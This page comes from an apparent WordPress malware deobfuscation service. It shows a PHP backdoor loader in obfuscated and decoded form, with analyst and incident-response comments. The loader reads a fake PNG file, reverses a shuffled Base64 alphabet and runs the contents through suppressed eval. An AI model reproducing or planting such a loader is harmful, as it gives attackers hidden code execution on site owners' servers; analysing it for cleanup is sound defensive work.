
PHP deobfuscation, decryption, reconstruction tool

De-obfuscates PHP malware, viruses and tampered code found on WordPress sites back into readable code.

*Please note that not every obfuscation scheme can be decoded.

The code below has been decoded.

<?php function surybu_beshaxyshav($vuneva_ehatahaw) { $ajepiva = strtr($vuneva_ehatahaw, array('r'=>'Q', 'F'=>'W', 'Q'=>'E', 'T'=>'R', 'D'=>'T', 'U'=>'Y', 'S'=>'U', 'C'=>'I', 'R'=>'O', 'M'=>'P', 'n'=>'A', 'Z'=>'S', 'G'=>'D', 'e'=>'F', 'K'=>'G', 'P'=>...



Obfuscated PHP code

<?php

/**
 * Payload decoder: undoes a fixed character substitution, then Base64-decodes
 * the result.
 *
 * The strtr() table holds 65 one-character pairs. Its keys and its values each
 * cover the Base64 alphabet (A-Z, a-z, 0-9, '+', '/') plus '=', and the values
 * are listed in keyboard-row order (QWERTYUIOP...). The input is therefore
 * Base64 text written with a shuffled alphabet. The array form of strtr()
 * replaces each character once and does not re-scan its own output, so the
 * pairs cannot chain into each other.
 *
 * Analyst note: the mapping literal is the most distinctive part of this
 * sample. The function and variable names look machine-generated and
 * presumably differ between infections (not confirmable from this page).
 *
 * @param string $vuneva_ehatahaw Text encoded with the shuffled alphabet.
 * @return string|false Result of base64_decode() on the re-mapped text.
 */
function surybu_beshaxyshav($vuneva_ehatahaw) {
    // Step 1: map every character back to its standard Base64 counterpart.
    $ajepiva = strtr($vuneva_ehatahaw, array('r'=>'Q', 'F'=>'W', 'Q'=>'E', 'T'=>'R', 'D'=>'T', 'U'=>'Y', 'S'=>'U', 'C'=>'I', 'R'=>'O', 'M'=>'P', 
        'n'=>'A', 'Z'=>'S', 'G'=>'D', 'e'=>'F', 'K'=>'G', 'P'=>'H', 't'=>'J', 'y'=>'K', '8'=>'L', 'E'=>'Z', 
        'O'=>'X', 'W'=>'C', '+'=>'V', 'B'=>'B', 'I'=>'N', 'a'=>'M', 'm'=>'q', 'A'=>'w', 'N'=>'e', 'i'=>'r', 
        'H'=>'t', 'j'=>'y', 'h'=>'u', 'J'=>'i', '3'=>'o', '/'=>'p', 'q'=>'a', '0'=>'s', 'o'=>'d', '='=>'f', 
        'w'=>'g', 'c'=>'h', '1'=>'j', 'V'=>'k', '7'=>'l', 'z'=>'z', 'u'=>'x', 'b'=>'c', 'd'=>'v', 'x'=>'b', 
        'X'=>'n', '5'=>'m', '2'=>'1', 'g'=>'2', 'p'=>'3', '9'=>'4', 'Y'=>'5', 'k'=>'6', 'L'=>'7', 'f'=>'8', 
        's'=>'9', '6'=>'0', 'v'=>'=', '4'=>'+', 'l'=>'/'));
    // Step 2: ordinary Base64 decode of the re-mapped text.
    $ajepiva = base64_decode($ajepiva);

    return $ajepiva;
}

/**
 * Reads a file from disk and returns its contents after decoding.
 *
 * Returns false when the path does not exist or when file_get_contents()
 * gives back an empty or otherwise falsy result. Otherwise the contents,
 * minus their first three bytes, are passed to surybu_beshaxyshav().
 *
 * @param string $vuneva_ehatahaw Path of the file holding the encoded data.
 * @return string|false Decoded data, or false if nothing could be read.
 */
function ujoxuq_wifechaze($vuneva_ehatahaw) {
    if (!file_exists($vuneva_ehatahaw))
        return false;
    // The @ operator hides any warning raised by the read.
    $baqoga = @file_get_contents($vuneva_ehatahaw);
    if (!$baqoga)
        return false;
    // Drop the first three bytes before decoding.
    // NOTE(review): their purpose is not visible here; presumably a marker or
    // filler placed in front of the encoded text. Confirm against the file.
    $baqoga = substr($baqoga, 3);
    $rivezyq = surybu_beshaxyshav($baqoga);
    return $rivezyq;
}

// Loader entry point: these statements run as soon as the file is included,
// outside any function.
//
// The path names a file with an image extension under this script's own
// directory. The code never treats it as an image; it reads the contents as
// encoded text.
$ujucac = __DIR__ . '/assets/images/wibubal.png';

if (file_exists($ujucac)) {
    $ashoceb = ujoxuq_wifechaze($ujucac);
    if ($ashoceb) {
        // Executes the decoded file contents as PHP, with diagnostics suppressed
        // by @. The code that actually runs is stored in wibubal.png, not in
        // this file, and is not shown on this page.
        //
        // Incident-response note: deleting this stub alone leaves the payload
        // file on disk. Collect and remove both. To learn what the payload
        // does, decode the file without executing it, in an isolated analysis
        // environment.
        @eval($ashoceb);
    }
}

Decoded (de-obfuscated) PHP code

<?php

/**
 * Payload decoder: undoes a fixed character substitution, then Base64-decodes
 * the result.
 *
 * The strtr() table holds 65 one-character pairs. Its keys and its values each
 * cover the Base64 alphabet (A-Z, a-z, 0-9, '+', '/') plus '=', so the input
 * is Base64 text written with a shuffled alphabet. The array form of strtr()
 * replaces each character once and does not re-scan its own output.
 *
 * Analyst note: the mapping literal is the most distinctive part of this
 * sample. The identifiers look machine-generated and presumably vary between
 * infections (not confirmable from this page).
 *
 * @param string $vuneva_ehatahaw Text encoded with the shuffled alphabet.
 * @return string|false Result of base64_decode() on the re-mapped text.
 */
function surybu_beshaxyshav($vuneva_ehatahaw)
{
    // Step 1: map every character back to its standard Base64 counterpart.
    $ajepiva = strtr($vuneva_ehatahaw, array('r' => 'Q', 'F' => 'W', 'Q' => 'E', 'T' => 'R', 'D' => 'T', 'U' => 'Y', 'S' => 'U', 'C' => 'I', 'R' => 'O', 'M' => 'P', 'n' => 'A', 'Z' => 'S', 'G' => 'D', 'e' => 'F', 'K' => 'G', 'P' => 'H', 't' => 'J', 'y' => 'K', '8' => 'L', 'E' => 'Z', 'O' => 'X', 'W' => 'C', '+' => 'V', 'B' => 'B', 'I' => 'N', 'a' => 'M', 'm' => 'q', 'A' => 'w', 'N' => 'e', 'i' => 'r', 'H' => 't', 'j' => 'y', 'h' => 'u', 'J' => 'i', '3' => 'o', '/' => 'p', 'q' => 'a', '0' => 's', 'o' => 'd', '=' => 'f', 'w' => 'g', 'c' => 'h', '1' => 'j', 'V' => 'k', '7' => 'l', 'z' => 'z', 'u' => 'x', 'b' => 'c', 'd' => 'v', 'x' => 'b', 'X' => 'n', '5' => 'm', '2' => '1', 'g' => '2', 'p' => '3', '9' => '4', 'Y' => '5', 'k' => '6', 'L' => '7', 'f' => '8', 's' => '9', '6' => '0', 'v' => '=', '4' => '+', 'l' => '/'));
    // Step 2: ordinary Base64 decode of the re-mapped text.
    $ajepiva = base64_decode($ajepiva);
    return $ajepiva;
}
/**
 * Reads a file from disk and returns its contents after decoding.
 *
 * Returns false when the path does not exist or when file_get_contents()
 * gives back an empty or otherwise falsy result. Otherwise the contents,
 * minus their first three bytes, are passed to surybu_beshaxyshav().
 *
 * @param string $vuneva_ehatahaw Path of the file holding the encoded data.
 * @return string|false Decoded data, or false if nothing could be read.
 */
function ujoxuq_wifechaze($vuneva_ehatahaw)
{
    if (!file_exists($vuneva_ehatahaw)) {
        return false;
    }
    // The @ operator hides any warning raised by the read.
    $baqoga = @file_get_contents($vuneva_ehatahaw);
    if (!$baqoga) {
        return false;
    }
    // Drop the first three bytes before decoding.
    // NOTE(review): their purpose is not visible here; presumably a marker or
    // filler placed in front of the encoded text. Confirm against the file.
    $baqoga = substr($baqoga, 3);
    $rivezyq = surybu_beshaxyshav($baqoga);
    return $rivezyq;
}
// Loader entry point: these statements run as soon as the file is included.
//
// NOTE(review): the obfuscated listing on this page builds this path from
// __DIR__. The literal directory below presumably comes from the decoding
// tool's own environment, so do not treat it as the path on the affected host.
// The file has an image extension, but the code reads it as encoded text.
$ujucac = "/var/www/html/assets/images/wibubal.png";
if (file_exists($ujucac)) {
    $ashoceb = ujoxuq_wifechaze($ujucac);
    if ($ashoceb) {
        // Executes the decoded file contents as PHP, with diagnostics suppressed
        // by @. This "decoded" output is still only the loader: the code that
        // actually runs is stored in wibubal.png and is not shown on this page.
        //
        // Incident-response note: deleting this stub alone leaves the payload
        // file on disk. Collect and remove both. To learn what the payload
        // does, decode the file without executing it, in an isolated analysis
        // environment.
        @eval($ashoceb);
    }
}



(C)2020 Wordpress Doctor All rights reserved.